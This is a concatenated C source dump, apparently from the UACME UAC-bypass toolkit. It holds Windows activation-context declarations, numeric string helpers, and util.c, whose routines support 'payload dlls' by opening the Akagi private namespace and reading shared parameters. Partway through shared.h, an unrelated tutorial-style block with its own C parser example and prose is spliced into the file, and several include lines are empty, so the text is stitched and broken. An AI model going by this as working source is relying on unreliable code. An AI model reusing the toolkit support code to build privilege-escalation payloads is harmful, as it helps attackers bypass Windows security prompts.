SXS_WINDOWS_SETTINGS_2011_NAMESPACE L"http://schemas.microsoft.com/SMI/2011/WindowsSettings" #define SXS_WINDOWS_SETTINGS_2011_NAMESPACE_CCH (53) #define SXS_WINDOWS_SETTINGS_2013_NAMESPACE L"http://schemas.microsoft.com/SMI/2013/WindowsSettings" #define 
SXS_WINDOWS_SETTINGS_2013_NAMESPACE_CCH (53) #define SXS_WINDOWS_SETTINGS_2014_NAMESPACE L"http://schemas.microsoft.com/SMI/2014/WindowsSettings" #define SXS_WINDOWS_SETTINGS_2014_NAMESPACE_CCH (53) #define SXS_WINDOWS_SETTINGS_2016_NAMESPACE L"http://schemas.microsoft.com/SMI/2016/WindowsSettings" #define SXS_WINDOWS_SETTINGS_2016_NAMESPACE_CCH (53) #define SXS_WINDOWS_SETTINGS_2017_NAMESPACE L"http://schemas.microsoft.com/SMI/2017/WindowsSettings" #define SXS_WINDOWS_SETTINGS_2017_NAMESPACE_CCH (53) typedef struct _ACTIVATION_CONTEXT_DATA_APPLICATION_SETTINGS { ULONG Size; ULONG Flags; ULONG SettingNamespaceLength; ULONG SettingNamespaceOffset; ULONG SettingNameLength; ULONG SettingNameOffset; ULONG SettingValueLength; ULONG SettingValueOffset; } ACTIVATION_CONTEXT_DATA_APPLICATION_SETTINGS, *PACTIVATION_CONTEXT_DATA_APPLICATION_SETTINGS; #define ACTIVATION_CONTEXT_DATA_COM_SERVER_REDIRECTION_FORMAT_WHISTLER (1) #define ACTIVATION_CONTEXT_DATA_COM_SERVER_REDIRECTION_THREADING_MODEL_INVALID (0) #define ACTIVATION_CONTEXT_DATA_COM_SERVER_REDIRECTION_THREADING_MODEL_APARTMENT (1) #define ACTIVATION_CONTEXT_DATA_COM_SERVER_REDIRECTION_THREADING_MODEL_FREE (2) #define ACTIVATION_CONTEXT_DATA_COM_SERVER_REDIRECTION_THREADING_MODEL_SINGLE (3) #define ACTIVATION_CONTEXT_DATA_COM_SERVER_REDIRECTION_THREADING_MODEL_BOTH (4) #define ACTIVATION_CONTEXT_DATA_COM_SERVER_REDIRECTION_THREADING_MODEL_NEUTRAL (5) #define ACTIVATION_CONTEXT_DATA_COM_SERVER_MISCSTATUS_FLAG_OFFSET (8) #define ACTIVATION_CONTEXT_DATA_COM_SERVER_MISCSTATUS_HAS_DEFAULT (0x01 << ACTIVATION_CONTEXT_DATA_COM_SERVER_MISCSTATUS_FLAG_OFFSET) #define ACTIVATION_CONTEXT_DATA_COM_SERVER_MISCSTATUS_HAS_ICON (0x02 << ACTIVATION_CONTEXT_DATA_COM_SERVER_MISCSTATUS_FLAG_OFFSET) #define ACTIVATION_CONTEXT_DATA_COM_SERVER_MISCSTATUS_HAS_CONTENT (0x04 << ACTIVATION_CONTEXT_DATA_COM_SERVER_MISCSTATUS_FLAG_OFFSET) #define ACTIVATION_CONTEXT_DATA_COM_SERVER_MISCSTATUS_HAS_THUMBNAIL (0x08 << 
ACTIVATION_CONTEXT_DATA_COM_SERVER_MISCSTATUS_FLAG_OFFSET) #define ACTIVATION_CONTEXT_DATA_COM_SERVER_MISCSTATUS_HAS_DOCPRINT (0x10 << ACTIVATION_CONTEXT_DATA_COM_SERVER_MISCSTATUS_FLAG_OFFSET) typedef struct _ACTIVATION_CONTEXT_DATA_COM_SERVER_REDIRECTION { ULONG Size; ULONG Flags; ULONG ThreadingModel; GUID ReferenceClsid; GUID ConfiguredClsid; GUID ImplementedClsid; GUID TypeLibraryId; ULONG ModuleLength; ULONG ModuleOffset; ULONG ProgIdLength; ULONG ProgIdOffset; ULONG ShimDataLength; ULONG ShimDataOffset; ULONG MiscStatusDefault; ULONG MiscStatusContent; ULONG MiscStatusThumbnail; ULONG MiscStatusIcon; ULONG MiscStatusDocPrint; } ACTIVATION_CONTEXT_DATA_COM_SERVER_REDIRECTION, *PACTIVATION_CONTEXT_DATA_COM_SERVER_REDIRECTION; #define ACTIVATION_CONTEXT_DATA_COM_SERVER_REDIRECTION_SHIM_TYPE_OTHER (1) #define ACTIVATION_CONTEXT_DATA_COM_SERVER_REDIRECTION_SHIM_TYPE_CLR_CLASS (2) typedef struct _ACTIVATION_CONTEXT_DATA_COM_SERVER_REDIRECTION_SHIM { ULONG Size; ULONG Flags; ULONG Type; ULONG ModuleLength; ULONG ModuleOffset; ULONG TypeLength; ULONG TypeOffset; ULONG ShimVersionLength; ULONG ShimVersionOffset; ULONG DataLength; ULONG DataOffset; } ACTIVATION_CONTEXT_DATA_COM_SERVER_REDIRECTION_SHIM, *PACTIVATION_CONTEXT_DATA_COM_SERVER_REDIRECTION_SHIM; typedef struct _ACTIVATION_CONTEXT_DATA_COM_TYPE_LIBRARY_REDIRECTION { ULONG Size; ULONG Flags; ULONG NameLength; ULONG NameOffset; USHORT ResourceId; USHORT LibraryFlags; ULONG HelpDirLength; ULONG HelpDirOffset; } ACTIVATION_CONTEXT_DATA_COM_TYPE_LIBRARY_REDIRECTION, *PACTIVATION_CONTEXT_DATA_COM_TYPE_LIBRARY_REDIRECTION; typedef struct _ACTIVATION_CONTEXT_DATA_COM_PROGID_REDIRECTION { ULONG Size; ULONG Flags; ULONG ConfiguredClsidOffset; } ACTIVATION_CONTEXT_DATA_COM_PROGID_REDIRECTION, *PACTIVATION_CONTEXT_DATA_COM_PROGID_REDIRECTION; typedef struct _SXS_OVERRIDE_MANIFEST { PCWSTR Name; PVOID Address; SIZE_T Size; } SXS_OVERRIDE_MANIFEST, *PSXS_OVERRIDE_MANIFEST; typedef struct _SXS_MANIFEST_STREAM { const IID* 
IIDStream; PVOID OutIStream; }SXS_MANIFEST_STREAM, *PSXS_MANIFEST_STREAM; typedef struct _ACTIVATION_CONTEXT_ASSEMBLY_DATA { ULONG Size; ULONG Flags; WCHAR *AssemblyName; ULONG AssemblyNameLength; ULONG HashAlgorithm; ULONG PseudoKey; } ACTIVATION_CONTEXT_ASSEMBLY_DATA, *PACTIVATION_CONTEXT_ASSEMBLY_DATA; typedef struct _ACTIVATION_CONTEXT_DATA_ASSEMBLY_ROSTER_HEADER { ULONG HeaderSize; ULONG HashAlgorithm; ULONG EntryCount; ULONG FirstEntryOffset; ULONG AssemblyInformationSectionOffset; } ACTIVATION_CONTEXT_DATA_ASSEMBLY_ROSTER_HEADER, *PACTIVATION_CONTEXT_DATA_ASSEMBLY_ROSTER_HEADER; #define ACTIVATION_CONTEXT_DATA_ASSEMBLY_ROSTER_ENTRY_INVALID (0x00000001) #define ACTIVATION_CONTEXT_DATA_ASSEMBLY_ROSTER_ENTRY_ROOT (0x00000002) typedef struct _ACTIVATION_CONTEXT_DATA_ASSEMBLY_ROSTER_ENTRY { ULONG Flags; ULONG PseudoKey; ULONG AssemblyNameOffset; ULONG AssemblyNameLength; ULONG AssemblyInformationOffset; ULONG AssemblyInformationLength; } ACTIVATION_CONTEXT_DATA_ASSEMBLY_ROSTER_ENTRY, *PACTIVATION_CONTEXT_DATA_ASSEMBLY_ROSTER_ENTRY; typedef struct _ACTIVATION_CONTEXT_SECTION_KEYED_DATA_ASSEMBLY_METADATA { PVOID Information; PVOID SectionBase; ULONG SectionLength; PVOID SectionGlobalDataBase; ULONG SectionGlobalDataLength; } ACTIVATION_CONTEXT_SECTION_KEYED_DATA_ASSEMBLY_METADATA, *PACTIVATION_CONTEXT_SECTION_KEYED_DATA_ASSEMBLY_METADATA; typedef struct _ACTIVATION_CONTEXT_SECTION_KEYED_DATA { ULONG Size; ULONG DataFormatVersion; PVOID Data; ULONG Length; PVOID SectionGlobalData; ULONG SectionGlobalDataLength; PVOID SectionBase; ULONG SectionTotalLength; PACTIVATION_CONTEXT ActivationContext; ULONG AssemblyRosterIndex; ULONG Flags; ACTIVATION_CONTEXT_SECTION_KEYED_DATA_ASSEMBLY_METADATA AssemblyMetadata; } ACTIVATION_CONTEXT_SECTION_KEYED_DATA, *PACTIVATION_CONTEXT_SECTION_KEYED_DATA; #define RTL_ACTIVATE_ACTIVATION_CONTEXT_EX_FLAG_RELEASE_ON_STACK_DEALLOCATION (0x00000001) NTSYSAPI NTSTATUS NTAPI RtlActivateActivationContextEx( _In_ ULONG Flags, _In_ PTEB Teb, 
_In_ PACTIVATION_CONTEXT ActivationContext, _Out_ PULONG_PTR Cookie); NTSYSAPI NTSTATUS NTAPI RtlQueryInformationActivationContext( _In_ ULONG Flags, _In_ PCACTIVATION_CONTEXT ActivationContext, _In_opt_ PVOID SubInstanceIndex, _In_ ACTIVATION_CONTEXT_INFO_CLASS ActivationContextInformationClass, _Out_ PVOID ActivationContextInformation, _In_ SIZE_T ActivationContextInformationLength, _Out_opt_ PSIZE_T ReturnLength); NTSYSAPI NTSTATUS NTAPI RtlQueryInformationActiveActivationContext( _In_ ACTIVATION_CONTEXT_INFO_CLASS ActivationContextInformationClass, _Out_ PVOID ActivationContextInformation, _In_ SIZE_T ActivationContextInformationLength, _Out_opt_ PSIZE_T ReturnLength); NTSYSAPI NTSTATUS NTAPI RtlAllocateActivationContextStack( _Inout_ PACTIVATION_CONTEXT_STACK *ActivationContextStackPointer); NTSYSAPI VOID NTAPI RtlFreeActivationContextStack( _In_ PACTIVATION_CONTEXT_STACK ActivationContextStackPointer); NTSYSAPI NTSTATUS NTAPI RtlCreateActivationContext( _In_ ULONG Flags, _In_ const PACTIVATION_CONTEXT_DATA ActivationContextData, _In_opt_ ULONG ExtraBytes, _In_opt_ PACTIVATION_CONTEXT_NOTIFY_ROUTINE NotificationRoutine, _In_opt_ PVOID NotificationContext, _Out_ PACTIVATION_CONTEXT *ActivationContext); NTSYSAPI VOID NTAPI RtlAddRefActivationContext( _In_ PACTIVATION_CONTEXT AppCtx); NTSYSAPI VOID NTAPI RtlReleaseActivationContext( _In_ PACTIVATION_CONTEXT AppCtx); NTSYSAPI NTSTATUS NTAPI RtlZombifyActivationContext( _In_ PACTIVATION_CONTEXT ActivationContext); NTSYSAPI NTSTATUS NTAPI RtlGetActiveActivationContext( _Out_ PACTIVATION_CONTEXT *ActivationContext); NTSYSAPI BOOLEAN NTAPI RtlIsActivationContextActive( _In_ PACTIVATION_CONTEXT ActivationContext); NTSYSAPI NTSTATUS NTAPI RtlQueryActivationContextApplicationSettings( _In_opt_ DWORD dwFlags, _In_opt_ HANDLE hActCtx, _In_opt_ PCWSTR settingsNameSpace, _In_ PCWSTR settingName, _Out_writes_bytes_to_opt_(dwBuffer, *pdwWrittenOrRequired) PWSTR pvBuffer, _In_ SIZE_T dwBuffer, _Out_opt_ SIZE_T 
*pdwWrittenOrRequired); NTSYSAPI NTSTATUS NTAPI RtlFindActivationContextSectionString( _In_ ULONG Flags, _In_opt_ CONST GUID *ExtensionGuid, _In_ ULONG SectionId, _In_ PCUNICODE_STRING StringToFind, _Inout_ PACTIVATION_CONTEXT_SECTION_KEYED_DATA ReturnedData); // // NTSXS_RTL HEADER END // #pragma warning(pop) #ifdef __cplusplus } #endif #endif NTSXS_RTL ================================================ FILE: Source/Shared/rtltypes.h ================================================ #pragma once #ifndef _WCHAR_T_DEFINED typedef unsigned short wchar_t; #define _WCHAR_T_DEFINED #endif /* _WCHAR_T_DEFINED */ #ifndef _SIZE_T_DEFINED #ifdef _WIN64 typedef unsigned __int64 size_t; #else /* _WIN64 */ typedef __w64 unsigned int size_t; #endif /* _WIN64 */ #define _SIZE_T_DEFINED #endif /* _SIZE_T_DEFINED */ __forceinline char locase_a(char c) { if ((c >= 'A') && (c <= 'Z')) return c + 0x20; else return c; } __forceinline wchar_t locase_w(wchar_t c) { if ((c >= 'A') && (c <= 'Z')) return c + 0x20; else return c; } __forceinline char byteabs(char x) { if (x < 0) return -x; return x; } __forceinline int _isdigit_a(char x) { return ((x >= '0') && (x <= '9')); } __forceinline int _isdigit_w(wchar_t x) { return ((x >= L'0') && (x <= L'9')); } ================================================ FILE: Source/Shared/shared.h ================================================ /******************************************************************************* * * (C) COPYRIGHT AUTHORS, 2018 - 2021 * * TITLE: SHARED.H * * VERSION: 3.56 * * DATE: 26 July 2021 * * Shared include header file. * * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED * TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A * PARTICULAR PURPOSE. * *******************************************************************************/ #pragma once //disable nonmeaningful warnings. 
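The string-section layout declared in ntsxs.h above (ACTIVATION_CONTEXT_STRING_SECTION_HEADER, ACTIVATION_CONTEXT_STRING_SECTION_ENTRY and the CASE_INSENSITIVE flag) is what the loader walks when it resolves a DLL redirection or a window class name, and every offset in it comes from the blob itself. The following is an added example, not code from UACME: it mirrors those two structures with fixed-width types so it builds on any platform, constructs a small section with made-up keys and values, and looks a key up with each offset bounds-checked against the section length before it is dereferenced. It scans the element list linearly instead of using the hash search structure (the pseudo-key hash algorithm is not on this page), folds case for ASCII only, and the names actctx_find_string, build_sample_section, SampleItem and demo are this example's own.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* Local, fixed-width mirrors of ACTIVATION_CONTEXT_STRING_SECTION_HEADER and
 * ACTIVATION_CONTEXT_STRING_SECTION_ENTRY from ntsxs.h, so this builds off Windows. */
#define ACTCTX_STRING_SECTION_MAGIC            0x64487353u /* 'dHsS' */
#define ACTCTX_STRING_SECTION_CASE_INSENSITIVE 0x00000001u

typedef struct {
    uint32_t Magic, HeaderSize, FormatVersion, DataFormatVersion, Flags;
    uint32_t ElementCount, ElementListOffset, HashAlgorithm;
    uint32_t SearchStructureOffset, UserDataOffset, UserDataSize;
} StringSectionHeader;

typedef struct {
    uint32_t PseudoKey, KeyOffset, KeyLength, Offset, Length, AssemblyRosterIndex;
} StringSectionEntry;

/* [off, off + len) must lie inside a buffer of `total` bytes; 64-bit math avoids wraparound. */
static int range_ok(uint32_t off, uint32_t len, size_t total)
{
    return (uint64_t)off + (uint64_t)len <= (uint64_t)total;
}

static uint16_t fold(uint16_t c) /* ASCII-only case fold; an assumption, not the SxS rule */
{
    return (c >= 'A' && c <= 'Z') ? (uint16_t)(c + 0x20) : c;
}

/* Linear scan of the element list (the hash search structure is skipped).
 * Returns 1 and sets *data/*data_len if found, 0 if absent, -1 if malformed. */
int actctx_find_string(const uint8_t *sec, size_t sec_len,
                       const uint16_t *key, uint32_t key_cch,
                       const uint8_t **data, uint32_t *data_len)
{
    StringSectionHeader hdr;
    if (sec_len < sizeof hdr) return -1;
    memcpy(&hdr, sec, sizeof hdr); /* copy out: never trust alignment of a mapped view */
    if (hdr.Magic != ACTCTX_STRING_SECTION_MAGIC || hdr.HeaderSize < sizeof hdr) return -1;
    if (hdr.ElementListOffset > sec_len) return -1;
    if (hdr.ElementCount > (sec_len - hdr.ElementListOffset) / sizeof(StringSectionEntry)) return -1;

    int ci = (hdr.Flags & ACTCTX_STRING_SECTION_CASE_INSENSITIVE) != 0;
    for (uint32_t i = 0; i < hdr.ElementCount; i++) {
        StringSectionEntry e;
        memcpy(&e, sec + hdr.ElementListOffset + (size_t)i * sizeof e, sizeof e);
        /* Every offset is relative to the section base and comes from the blob itself:
         * validate before dereferencing, even for entries whose key will not match. */
        if ((e.KeyLength & 1) || !range_ok(e.KeyOffset, e.KeyLength, sec_len)) return -1;
        if (!range_ok(e.Offset, e.Length, sec_len)) return -1;
        if (e.KeyLength / 2 != key_cch) continue;

        const uint8_t *k = sec + e.KeyOffset;
        uint32_t j;
        for (j = 0; j < key_cch; j++) {
            uint16_t c = (uint16_t)(k[2 * j] | (k[2 * j + 1] << 8)); /* UTF-16LE */
            if (ci ? fold(c) != fold(key[j]) : c != key[j]) break;
        }
        if (j == key_cch) { *data = sec + e.Offset; *data_len = e.Length; return 1; }
    }
    return 0;
}

typedef struct { const char *key; const char *data; } SampleItem; /* constructed test input */

/* Serialise `n` items into a well-formed section; returns its byte length (0 on overflow). */
size_t build_sample_section(uint8_t *buf, size_t cap, const SampleItem *items, uint32_t n)
{
    StringSectionHeader hdr = {0};
    size_t list = sizeof hdr, cur = list + (size_t)n * sizeof(StringSectionEntry);
    if (cur > cap) return 0;
    for (uint32_t i = 0; i < n; i++) {
        StringSectionEntry e = {0};
        size_t kl = strlen(items[i].key), dl = strlen(items[i].data);
        if (cur + 2 * kl + dl > cap) return 0;
        e.KeyOffset = (uint32_t)cur; e.KeyLength = (uint32_t)(2 * kl);
        for (size_t j = 0; j < kl; j++) { buf[cur++] = (uint8_t)items[i].key[j]; buf[cur++] = 0; }
        e.Offset = (uint32_t)cur; e.Length = (uint32_t)dl; e.AssemblyRosterIndex = i + 1;
        memcpy(buf + cur, items[i].data, dl); cur += dl;
        memcpy(buf + list + (size_t)i * sizeof e, &e, sizeof e);
    }
    hdr.Magic = ACTCTX_STRING_SECTION_MAGIC; hdr.HeaderSize = sizeof hdr;
    hdr.FormatVersion = 1; hdr.DataFormatVersion = 1;
    hdr.Flags = ACTCTX_STRING_SECTION_CASE_INSENSITIVE;
    hdr.ElementCount = n; hdr.ElementListOffset = (uint32_t)list;
    memcpy(buf, &hdr, sizeof hdr);
    return cur;
}

/* Look up a key in a constructed section, then corrupt an entry offset and look again. */
int demo(void)
{
    static uint8_t sec[256];
    const SampleItem items[] = { { "comctl32.dll", "redirect:v6" }, { "example.dll", "redirect:private" } };
    const uint16_t key[] = { 'C','O','M','C','T','L','3','2','.','D','L','L' };
    const uint8_t *d; uint32_t dl;
    size_t len = build_sample_section(sec, sizeof sec, items, 2);
    if (actctx_find_string(sec, len, key, 12, &d, &dl) != 1 || dl != 11 || memcmp(d, "redirect:v6", 11))
        return -100;
    StringSectionEntry e;
    memcpy(&e, sec + sizeof(StringSectionHeader), sizeof e);
    e.Offset = 0xFFFFFFF0u; /* data offset now points far past the section end */
    memcpy(sec + sizeof(StringSectionHeader), &e, sizeof e);
    return actctx_find_string(sec, len, key, 12, &d, &dl); /* -1: rejected before any read */
}

int main(void)
{
    int r = demo();
    printf("tampered section -> %d (expected -1)\n", r);
    return r == -1 ? 0 : 1;
}
```

range_ok does its arithmetic in 64 bits because KeyOffset + KeyLength on two 32-bit fields can wrap and land back inside the buffer; an activation context blob mapped from a manifest or a section you did not create is untrusted input, and the same discipline applies to the GUID-section, TOC and assembly-roster structures declared alongside, whose Offset/Length pairs are relative to the same base.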
#pragma warning(push) #pragma warning(disable: 4005) // macro redefinition #pragma warning(disable: 4055) // %s : from data pointer %s to function pointer %s #pragma warning(disable: 4201) // nonstandard extension used : nameless struct/union #include #include #include "ntos\ntos.h" #include "ntos\ntbuilds.h" #define _NTDEF_ #include #undef _NTDEF_ #include "minirtl.h" #include "_filename.h" #include "util.h" #include "windefend.h" #include "consts.h" #if defined(__cplusplus) #include #endif #pragma warning(pop) ================================================ FILE: Source/Shared/strtoi.c ================================================ #include "rtltypes.h" int strtoi_a(char *s) { int a = 0, sign; char c; if (s == 0) return 0; switch (*s) { case '-': s++; sign = -1; break; case '+': s++; sign = 1; break; default: sign = 1; } while (*s != 0) { c = *s; if (_isdigit_a(c)) a = (a*10) + (c-'0'); else break; s++; } return a*sign; } int strtoi_w(wchar_t *s) { int a = 0, sign; wchar_t c; if (s == 0) return 0; switch (*s) { case L'-': s++; sign = -1; break; case L'+': s++; sign = 1; break; default: sign = 1; } while (*s != 0) { c = *s; if (_isdigit_w(c)) a = (a*10)+(c-L'0'); else break; s++; } return a*sign; } ================================================ FILE: Source/Shared/strtoul.c ================================================ #include "rtltypes.h" unsigned long strtoul_a(char *s) { unsigned long a = 0; char c; if (s == 0) return 0; while (*s != 0) { c = *s; if (_isdigit_a(c)) a = (a*10)+(c-'0'); else break; s++; } return a; } unsigned long strtoul_w(wchar_t *s) { unsigned long a = 0; wchar_t c; if (s == 0) return 0; while (*s != 0) { c = *s; if (_isdigit_w(c)) a = (a*10)+(c-L'0'); else break; s++; } return a; } ================================================ FILE: Source/Shared/u64tohex.c ================================================ #include "rtltypes.h" size_t u64tohex_a(unsigned long long x, char *s) { char p; size_t c; if (s==0) return 16; for (c=0; c<16; 
c++) { p = (char)(x & 0xf); x >>= 4; if (p<10) p += '0'; else p = 'A' + (p-10); s[15-c] = p; } s[16] = 0; return 16; } size_t u64tohex_w(unsigned long long x, wchar_t *s) { wchar_t p; size_t c; if (s==0) return 16; for (c = 0; c<16; c++) { p = (wchar_t)(x & 0xf); x >>= 4; if (p<10) p += L'0'; else p = L'A' + (p-10); s[15-c] = p; } s[16] = 0; return 16; } ================================================ FILE: Source/Shared/u64tostr.c ================================================ #include "rtltypes.h" size_t u64tostr_a(unsigned long long x, char *s) { unsigned long long t = x; size_t i, r=1; while ( t >= 10 ) { t /= 10; r++; } if (s == 0) return r; for (i = r; i != 0; i--) { s[i-1] = (char)(x % 10) + '0'; x /= 10; } s[r] = (char)0; return r; } size_t u64tostr_w(unsigned long long x, wchar_t *s) { unsigned long long t = x; size_t i, r=1; while ( t >= 10 ) { t /= 10; r++; } if (s == 0) return r; for (i = r; i != 0; i--) { s[i-1] = (wchar_t)(x % 10) + L'0'; x /= 10; } s[r] = (wchar_t)0; return r; } ================================================ FILE: Source/Shared/ultohex.c ================================================ #include "rtltypes.h" size_t ultohex_a(unsigned long x, char *s) { char p; size_t c; if (s==0) return 8; for (c=0; c<8; c++) { p = (char)(x & 0xf); x >>= 4; if (p<10) p += '0'; else p = 'A' + (p-10); s[7-c] = p; } s[8] = 0; return 8; } size_t ultohex_w(unsigned long x, wchar_t *s) { wchar_t p; size_t c; if (s==0) return 8; for (c=0; c<8; c++) { p = (wchar_t)(x & 0xf); x >>= 4; if (p<10) p += L'0'; else p = L'A' + (p-10); s[7-c] = p; } s[8] = 0; return 8; } ================================================ FILE: Source/Shared/ultostr.c ================================================ #include "rtltypes.h" size_t ultostr_a(unsigned long x, char *s) { unsigned long t=x; size_t i, r=1; while ( t >= 10 ) { t /= 10; r++; } if (s == 0) return r; for (i = r; i != 0; i--) { s[i-1] = (char)(x % 10) + '0'; x /= 10; } s[r] = (char)0; return r; } size_t 
ultostr_w(unsigned long x, wchar_t *s) { unsigned long t=x; size_t i, r=1; while ( t >= 10 ) { t /= 10; r++; } if (s == 0) return r; for (i = r; i != 0; i--) { s[i-1] = (wchar_t)(x % 10) + L'0'; x /= 10; } s[r] = (wchar_t)0; return r; } ================================================ FILE: Source/Shared/util.c ================================================ /******************************************************************************* * * (C) COPYRIGHT AUTHORS, 2017 - 2025 * * TITLE: UTIL.C * * VERSION: 3.69 * * DATE: 07 Jul 2025 * * Global support routines file shared between payload dlls. * * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED * TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A * PARTICULAR PURPOSE. * *******************************************************************************/ #undef _TRACE_CALL #include "shared.h" /* * ucmxHeapAlloc * * Purpose: * * Wrapper for RtlAllocateHeap. * */ PVOID ucmxHeapAlloc( _In_ SIZE_T NumberOfBytes ) { return RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, HEAP_ZERO_MEMORY, NumberOfBytes); } /* * ucmxHeapFree * * Purpose: * * Wrapper for RtlFreeHeap. * */ BOOLEAN ucmxHeapFree( _In_ PVOID BaseAddress ) { return RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, BaseAddress); } /* * ucmIsProcess32bit * * Purpose: * * Return TRUE if given process is under WOW64, FALSE otherwise. 
* */ BOOLEAN ucmIsProcess32bit( _In_ HANDLE hProcess ) { NTSTATUS status; PROCESS_EXTENDED_BASIC_INFORMATION pebi; if (hProcess == NULL) { return FALSE; } //query if this is wow64 process RtlSecureZeroMemory(&pebi, sizeof(pebi)); pebi.Size = sizeof(PROCESS_EXTENDED_BASIC_INFORMATION); status = NtQueryInformationProcess(hProcess, ProcessBasicInformation, &pebi, sizeof(pebi), NULL); if (NT_SUCCESS(status)) { return (pebi.IsWow64Process == 1); } return FALSE; } /* * ucmxQuerySystemDirectory * * Purpose: * * Query system directory full path including slash (with wow64 support). * */ VOID ucmxQuerySystemDirectory( _Inout_ LPWSTR lpSystemDirectory, _In_ BOOLEAN CheckWow64) { WCHAR szSystem32Prep[] = { L'\\', L's', L'y', L's', 0 }; WCHAR szSystem32Final[] = { L't', L'e', L'm', L'3', L'2', L'\\', 0 }; WCHAR szWow64Final[] = { L'w', L'o', L'w', L'6', L'4', L'\\', 0 }; _strcpy(lpSystemDirectory, USER_SHARED_DATA->NtSystemRoot); _strcat(lpSystemDirectory, szSystem32Prep); if (CheckWow64) { if (ucmIsProcess32bit(NtCurrentProcess())) { _strcat(lpSystemDirectory, szWow64Final); } else { _strcat(lpSystemDirectory, szSystem32Final); } } else { _strcat(lpSystemDirectory, szSystem32Final); } } /* * ucmBinTextEncode * * Purpose: * * Create pseudo random string from UI64 value. * */ VOID ucmBinTextEncode( _In_ unsigned __int64 x, _Inout_ wchar_t* s ) { char tbl[64]; char c = 0; int p; tbl[62] = '-'; tbl[63] = '_'; for (c = 0; c < 26; ++c) { tbl[c] = 'A' + c; tbl[26 + c] = 'a' + c; if (c < 10) tbl[52 + c] = '0' + c; } for (p = 0; p < 13; ++p) { c = x & 0x3f; x >>= 5; *s = (wchar_t)tbl[c]; ++s; } *s = 0; } /* * ucmGenerateSharedObjectName * * Purpose: * * Create pseudo random object name from it ID. 
* */ VOID ucmGenerateSharedObjectName( _In_ WORD ObjectId, _Inout_ LPWSTR lpBuffer ) { ULARGE_INTEGER value; value.LowPart = MAKELONG( MAKEWORD(UCM_VERSION_BUILD, UCM_VERSION_REVISION), MAKEWORD(UCM_VERSION_MINOR, UCM_VERSION_MAJOR)); value.HighPart = MAKELONG(UACME_SHARED_BASE_ID, ObjectId); ucmBinTextEncode(value.QuadPart, lpBuffer); } /* * ucmxCreateBoundaryDescriptorSID * * Purpose: * * Create special SID to access isolated namespace. * */ PSID ucmxCreateBoundaryDescriptorSID( SID_IDENTIFIER_AUTHORITY* SidAuthority, UCHAR SubAuthorityCount, ULONG* SubAuthorities ) { ULONG i; PSID pSid; pSid = ucmxHeapAlloc(RtlLengthRequiredSid(SubAuthorityCount)); if (pSid) { if (NT_SUCCESS(RtlInitializeSid(pSid, SidAuthority, SubAuthorityCount))) { for (i = 0; i < SubAuthorityCount; i++) *RtlSubAuthoritySid(pSid, i) = SubAuthorities[i]; return pSid; } ucmxHeapFree(pSid); } return NULL; } /* * ucmOpenAkagiNamespace * * Purpose: * * Open Akagi private namespace. * * Use NtClose on returned handle. * */ HANDLE ucmOpenAkagiNamespace( VOID ) { HANDLE hNamespace = NULL; HANDLE hBoundary = NULL; PSID pWorldSid; SID_IDENTIFIER_AUTHORITY SidWorldAuthority = SECURITY_WORLD_SID_AUTHORITY; UNICODE_STRING usName; OBJECT_ATTRIBUTES obja = RTL_INIT_OBJECT_ATTRIBUTES((PUNICODE_STRING)NULL, 0); ULONG SubAuthoritiesWorld[] = { SECURITY_WORLD_RID, 0, 0, 0, 0, 0, 0, 0 }; WCHAR szBoundaryDescriptorName[128]; RtlSecureZeroMemory(&szBoundaryDescriptorName, sizeof(szBoundaryDescriptorName)); ucmGenerateSharedObjectName((WORD)AKAGI_BDESCRIPTOR_NAME_ID, szBoundaryDescriptorName); RtlInitUnicodeString(&usName, szBoundaryDescriptorName); do { // // Create and assign boundary descriptor. 
        //
        hBoundary = RtlCreateBoundaryDescriptor(&usName, 0);
        if (hBoundary == NULL)
            break;

        pWorldSid = ucmxCreateBoundaryDescriptorSID(
            &SidWorldAuthority,
            1,
            SubAuthoritiesWorld);

        if (pWorldSid == NULL)
            break;

        //
        // RtlAddSIDToBoundaryDescriptor copies the SID into the (reallocated)
        // descriptor, so the local SID is released on both paths.
        //
        if (!NT_SUCCESS(RtlAddSIDToBoundaryDescriptor(&hBoundary, pWorldSid))) {
            RtlFreeSid(pWorldSid);
            break;
        }
        RtlFreeSid(pWorldSid);

        if (!NT_SUCCESS(NtOpenPrivateNamespace(
            &hNamespace,
            MAXIMUM_ALLOWED,
            &obja,
            hBoundary)))
        {
            break;
        }

    } while (FALSE);

    if (hBoundary)
        RtlDeleteBoundaryDescriptor(hBoundary);

    return hNamespace;
}

/*
* ucmReadSharedParameters
*
* Purpose:
*
* Read shared parameters from Akagi.
*
* Return TRUE on success, FALSE otherwise.
*
*/
_Success_(return == TRUE)
BOOL ucmReadSharedParameters(
    _Out_ UACME_PARAM_BLOCK * SharedParameters
)
{
    BOOL bResult = FALSE;
    ULONG Crc32;
    HANDLE hNamespace = NULL, hSection = NULL;
    PVOID SectionBuffer = NULL;
    SIZE_T ViewSize = PAGE_SIZE;
    UNICODE_STRING usName;
    OBJECT_ATTRIBUTES obja;
    UACME_PARAM_BLOCK sharedParameters;
    WCHAR szSectionName[128];

    do {
        hNamespace = ucmOpenAkagiNamespace();
        if (hNamespace == NULL)
            break;

        RtlSecureZeroMemory(&szSectionName, sizeof(szSectionName));
        ucmGenerateSharedObjectName((WORD)AKAGI_SHARED_SECTION_ID, szSectionName);
        RtlInitUnicodeString(&usName, szSectionName);
        InitializeObjectAttributes(&obja, &usName, OBJ_CASE_INSENSITIVE, hNamespace, NULL);

        if (NT_SUCCESS(NtOpenSection(&hSection, SECTION_ALL_ACCESS, &obja))) {

            if (NT_SUCCESS(NtMapViewOfSection(
                hSection,
                NtCurrentProcess(),
                &SectionBuffer,
                0,
                PAGE_SIZE,
                NULL,
                &ViewSize,
                ViewUnmap,
                MEM_TOP_DOWN,
                PAGE_READONLY)))
            {
                RtlSecureZeroMemory(&sharedParameters, sizeof(UACME_PARAM_BLOCK));
                RtlCopyMemory(&sharedParameters, SectionBuffer, sizeof(UACME_PARAM_BLOCK));
                //
